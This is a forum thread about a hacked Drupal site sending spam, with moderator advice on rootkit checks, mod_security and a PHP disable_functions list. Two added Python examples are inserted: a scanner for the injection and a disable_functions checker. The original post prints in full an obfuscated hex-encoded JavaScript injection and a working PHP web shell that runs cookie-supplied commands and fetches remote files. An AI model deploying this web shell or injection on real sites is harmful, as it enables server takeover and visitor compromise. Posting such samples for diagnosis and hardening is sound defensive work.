Server/site got hacked multiple times

Discussion in 'General' started by hermestrismegistus, Sep 16, 2013.

  1. hermestrismegistus

    hermestrismegistus New Member

    Hello people,

    This weekend I was, for once, in trouble... Again.

    Saturday morning I woke up and, as always, checked my ISPConfig admin panel and the logs, because lately I got hacked several times with the goal of sending spam from my server. Twice the server even crashed, because too many emails got returned.

    The first time my server had spam abuse, I discovered by looking at the email logs that all the spam got sent with [email protected]. (Since one of my websites has a web10 root directory, I assumed this would probably be the website that got exploited in some way or other.)

    It happened that this was a website I made myself (I'm not a security expert), so it didn't surprise me that this was the case. Because I had noticed that spam was the only purpose for which they hacked the websites, I decided to disable all the webmail parts. I expected to discover this way whether this would solve the spam problem. It did, at least for a while, but then all of a sudden, boom... server down, and indeed, as you would expect, spam was the cause.

    Since my old website was not secure enough, I decided to replace my website with a Drupal 7.23 version, at least for a while. For a while nothing happened, but Saturday morning, when I was just checking the logs and wanted to log in to my Drupal site, I suddenly had a PHP error. When looking in the error logs I found this:

    Code:
    2013] [warn] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '<' in /var/www/clients/client1/web10/web/themes/seven/template.php on line 144
    [Sat Sep 14 11:53:20 2013] [warn] [client 143.176.53.243] mod_fcgid: stderr: PHP Parse error:  syntax error, unexpected '<' in /var/www/clients/client1/web10/web/themes/seven/template.php on line 144, referer: https://www.astrobusinessclub.nl/
    [Sat Sep 14 12:19:08
    So when I logged in to the FTP and looked inside the template, I found something scary at the bottom of it.

    Code:
    <?
    #a9a007#
                                                                                                                                                                                                                                                              if(empty($tokk)) { $tokk = " <script type=\"text/javascript\" language=\"javascript\"> jtgx=\"spl\"+\"i\"+\"t\";xttq=window;joobzh=\"0\"+\"x\";hzmer=(5-3-1);try{--(document[\"body\"])}catch(ztf){wnwsjy=false;try{}catch(sfckzc){wnwsjy=21;}if(1){suha=\"17:5d:6c:65:5a:6b:60:66:65:17:58:65:5c:6b:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:58:65:5c:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:58:65:5c:6b:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:61:6c:6a:6b:63:58:6c:5e:5f:60:65:5e:25:5a:66:64:25:58:6c:26:6a:5a:69:60:67:6b:6a:26:5b:6b:5b:25:67:5f:67:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2f:2b:2a:27:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2f:2b:2a:27:67:6f:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2f:2b:2a:27:67:6f:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2f:2b:2a:27:1e:32:4:1:17:58:65:5c:6b:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2f:2b:2a:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:58:65:5c:6b:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:58:65:5c:6b:53:1e:17:5a:63:58:6a:6a:34:53:1e:58:65:5c:6b:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:58:65:5c:6
b:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:58:65:5c:6b:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:
5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:58:65:5c:6b:27:30:1f:20:32:4:1:74:4:1:74\"[jtgx](\":\");}xttq=suha;tpjm=[];for(xrufi=22-20-2;-xrufi+1425!=0;xrufi+=1){max=xrufi;if((0x19==031))tpjm+=String.fromCharCode(eval(joobzh+xttq[1*max])+0xa-hzmer);}cspnn=eval;cspnn(tpjm)}</script> "; echo $tokk; }
    #/a9a007#
    ?>

    When looking a bit more through the error logs, I noticed something even more scary: it seemed there was even a file that shouldn't have been in the profile directory of Drupal.

    Code:
    2013] [warn] mod_fcgid: stderr: PHP Notice:  Undefined index: XERATUTA in /var/www/clients/client1/web10/web/profiles/4nJDt3MC.php on line 72
    [Mon Sep 09 09:44:10 2013] [warn] [client 150.217.155.58] mod_fcgid: stderr: PHP Notice:  Undefined index: XERATUTA in /var/www/clients/client1/web10/web/profiles/4nJDt3MC.php on line 73
    [Mon Sep 09 09:44:10 2013] [warn] [client 150.217.155.58] mod_fcgid: stderr: PHP Notice:  Undefined index: XERATUTA in /var/www/clients/client1/web10/web/profiles/4nJDt3MC.php on line 74
    [Mon Sep 09 16:56:39
    
    When looking in this file, I found the following:

    Code:
    <?php
    //curl -v --cookie "XERATUTA=w" URL
    //adjust system variables
    if([email protected]($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}
    //die with error
    function x_die($m)[email protected]('HTTP/1.1 500 '.$m);@die();}
    //check if we can exec
    define('has_passthru',@function_exists('passthru'));
    define('has_system',@function_exists('system'));
    define('has_shell_exec',@function_exists('shell_exec'));
    define('has_popen',@function_exists('popen'));
    define('has_proc_open',@function_exists('proc_open'));
    define('has_exec',@function_exists('exec'));
    define('can_exec',(has_passthru||has_system||has_shell_exec||has_popen||has_proc_open||has_exec));
    if(!can_exec){x_die('can not exec: no functions available');}
    //check if we can config
    define('has_ini_get',@function_exists('ini_get'));
    define('has_ini_get_all',@function_exists('ini_get_all'));
    define('can_config',(has_ini_get||has_ini_get_all));
    if(!can_config){x_die('can not config');}
    //get config value
    function x_ini_get($n){if(has_ini_get){return(@ini_get($n));}elseif(has_ini_get_all)[email protected]_get_all();return($h[$n]['local_value']);}}
    // check safe mode
    if(x_ini_get('safe_mode')){x_die('can not exec: safe mode active');}
    //smart exec helpers
    function x_passthru($c)[email protected]($c);}
    function x_system($c)[email protected]($c);}
    function x_shell_exec($c){echo @shell_exec($c);}
    function x_popen($c){$o;if(([email protected]($c,'r'))){while([email protected]($f))[email protected]($f);[email protected]($f);}echo $o;}
    function x_proc_open($c){$o;if(@is_resource([email protected]_open($c,array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')),$f)))[email protected]($f[0]);while([email protected]($f[1]))[email protected]($f[1]);[email protected]($f[1]);@proc_close($p);}echo $o;}
    function x_exec($c){$o;@exec($c,$o);echo @implode("\n",$o);}
    //do smart fetch
    function x_superfetch($a,$p,$r,$l) {
            if([email protected]($a,$p)) {
                    if([email protected]($l,"wb")) {
                            @fwrite($s,"GET ".$r." HTTP/1.0\r\n\r\n");
                            while([email protected]($s)) {
                                    [email protected]($s,8192);
                                    @fwrite($f,$b);
                            }
                            @fclose($f);
                            echo "OK\n";
                    }
                    @fclose($s);
            }
    }
    //do smart exec
    function x_smart_exec($c) {
            if($c==="which superfetch 1> /dev/null 2> /dev/null && echo OK") {
                    echo "OK\n";
            }
            elseif(@strstr($c,"superfetch")) {
                    [email protected](' ',$c);
                    x_superfetch($a[1],$a[2],$a[3],$a[4]);
            }
            elseif(has_passthru){x_passthru($c);}
            elseif(has_system){x_system($c);}
            elseif(has_shell_exec){x_shell_exec($c);}
            elseif(has_popen){x_popen($c);}
            elseif(has_proc_open){x_proc_open($c);}
            elseif(has_exec){x_exec($c);}
    }
    //go
    $n='XERATUTA';
    $c=$_COOKIE[$n];
    if(@empty($c)){$c=$_POST[$n];}
    if(@empty($c)){$c=$_GET[$n];}
    if(@get_magic_quotes_gpc()){$c=stripslashes($c);}
    x_smart_exec($c);
    ?>
    This is what truly scared me off big time. I deleted the file right away and re-uploaded the template.php file, but the spam kept going on. Finally I disabled postfix. I did some reading and installed mod-security, which seems to have solved the problem for now. Later on I found out that more PHP files seemed to have the injected code in them. All these files were part of the default templates in Drupal.

    This pretty much scared me off. Till now, with mod-security, things seem to have been solved. But what I wonder is: is it really Drupal that got hacked? Or is the server itself hacked....

    I really can use all the help in the world to find out more, because it wouldn't surprise me if I have stopped the spam for only a couple of days. So any tips/help to find out what exactly gets exploited is appreciated.
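
Added example (not part of the original post): a Python scanner for the pattern shown in template.php above, a block wrapped in matching `#a9a007#` / `#/a9a007#` style markers that carries a long colon-separated hex string and a `fromCharCode`/`eval` decoder. The file-extension set, the 40-byte threshold and the sample strings are assumptions of this example; the sample uses harmless filler bytes, not the payload from the post.

```python
import os
import re

# "#<6 hex>#" ... "#/<same 6 hex>#" comment pair, as around the block above.
MARKER_BLOCK = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.DOTALL)
# Long run of colon-separated hex bytes (the encoded script body).
HEX_RUN = re.compile(r"(?:[0-9a-f]{1,2}:){40,}[0-9a-f]{1,2}", re.IGNORECASE)
DECODER_HINTS = ("fromCharCode", "eval")
SCAN_EXTENSIONS = (".php", ".inc", ".module", ".js", ".html")  # assumed set


def find_injections(text):
    """Return one finding per marker-delimited block in a file's contents."""
    findings = []
    for m in MARKER_BLOCK.finditer(text):
        body = m.group(2)
        findings.append({
            "marker": m.group(1),
            "line": text.count("\n", 0, m.start()) + 1,
            "hex_run": bool(HEX_RUN.search(body)),
            "hints": [h for h in DECODER_HINTS if h in body],
        })
    return findings


def scan_tree(root):
    """Walk a web root; map each affected file path to its findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = find_injections(fh.read())
                if found:
                    hits[path] = found
    return hits


# Constructed sample: harmless filler bytes stand in for the encoded payload.
_FILLER = ":".join(["41"] * 60)
SAMPLE_INFECTED = (
    "<?php\nfunction seven_example() {}\n?>\n<?\n#a9a007#\n"
    'if(empty($tokk)) { $tokk = "<script>s=\\"' + _FILLER + '\\";'
    'String.fromCharCode(0);eval(s)</script>"; echo $tokk; }\n'
    "#/a9a007#\n?>\n"
)
SAMPLE_CLEAN = "<?php\n/* colour #a9a007 in a stylesheet comment */\necho 'ok';\n"

if __name__ == "__main__":
    print(find_injections(SAMPLE_INFECTED))
```

Run `scan_tree()` on the site's web directory; every hit is a file to compare against a known-good copy of the same Drupal release.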
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    Most likely just drupal was hacked, not your server. If the server would have been hacked, the files would be hidden somewhere else and not in the drupal website directory. Also installing mod-security would not have helped if your server was hacked.

    But nevertheless you should check your server with rkhunter and chkrootkit to see if there were any rootkits found.

    Installing mod-security was a good choice as it can help to protect your website against such attacks.
     
  3. hermestrismegistus

    hermestrismegistus New Member

    Thanks till, I was expecting the same. Though it made me slightly paranoid.

    Are there more things that could prevent my drupal site from being hacked at the server side? Extra security like mod_security seems to be of great importance then.
     
  4. till

    till Super Moderator Staff Member ISPConfig Developer

    Ensure that you use the right PHP mode. I recommend using either php-fcgi or php-fpm, and suexec has to be enabled. This ensures that all PHP scripts are run under the user of this website.

    - harden PHP by disabling functions that allow the execution of programs or scripts in that website. For example, add:

    Code:
    disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abort, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpassthru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo
    this line in the custom php.ini field of the site. There might be more functions to be excluded or it might be that joomla needs some of these functions, the above is just meant as an example and starting point.
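
Added example (not from the thread): a Python check of a `disable_functions` line against the six functions that the uploaded 4nJDt3MC.php tests with `function_exists()`. `POSTED_INI` is a constructed excerpt of the list above and `EXTENDED_INI` is a hypothetical variant; for the posted list the check reports `popen` as still callable.

```python
# The six functions the uploaded shell (4nJDt3MC.php) tests with function_exists().
SHELL_EXEC_FUNCTIONS = ("passthru", "system", "shell_exec", "popen", "proc_open", "exec")


def parse_disable_functions(ini_text):
    """Return the disabled names from the active disable_functions line."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or "=" not in line:
            continue  # blank line, comment, or section header
        key, value = line.split("=", 1)
        if key.strip().lower() != "disable_functions":
            continue
        # Drop a trailing ";" comment and surrounding quotes.
        value = value.split(";", 1)[0].strip().strip('"')
        # If the directive is repeated, this example keeps the last one.
        # PHP function names are case-insensitive, so compare in lower case.
        disabled = {n.strip().lower() for n in value.split(",") if n.strip()}
    return disabled


def still_callable(ini_text, wanted=SHELL_EXEC_FUNCTIONS):
    """List the program-execution functions the ini text leaves enabled."""
    disabled = parse_disable_functions(ini_text)
    return [name for name in wanted if name not in disabled]


# Constructed excerpt of the list posted above (same execution-related entries).
POSTED_INI = """\
; custom php.ini field of the site
disable_functions = passthru, shell_exec, dl, exec, system, proc_open, proc_close, phpinfo
"""
# Hypothetical variant with popen added.
EXTENDED_INI = """\
disable_functions = passthru, shell_exec, dl, exec, system, popen, proc_open, proc_close, phpinfo
"""

if __name__ == "__main__":
    print("posted list leaves enabled:", still_callable(POSTED_INI))
    print("extended list leaves enabled:", still_callable(EXTENDED_INI))
```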
     
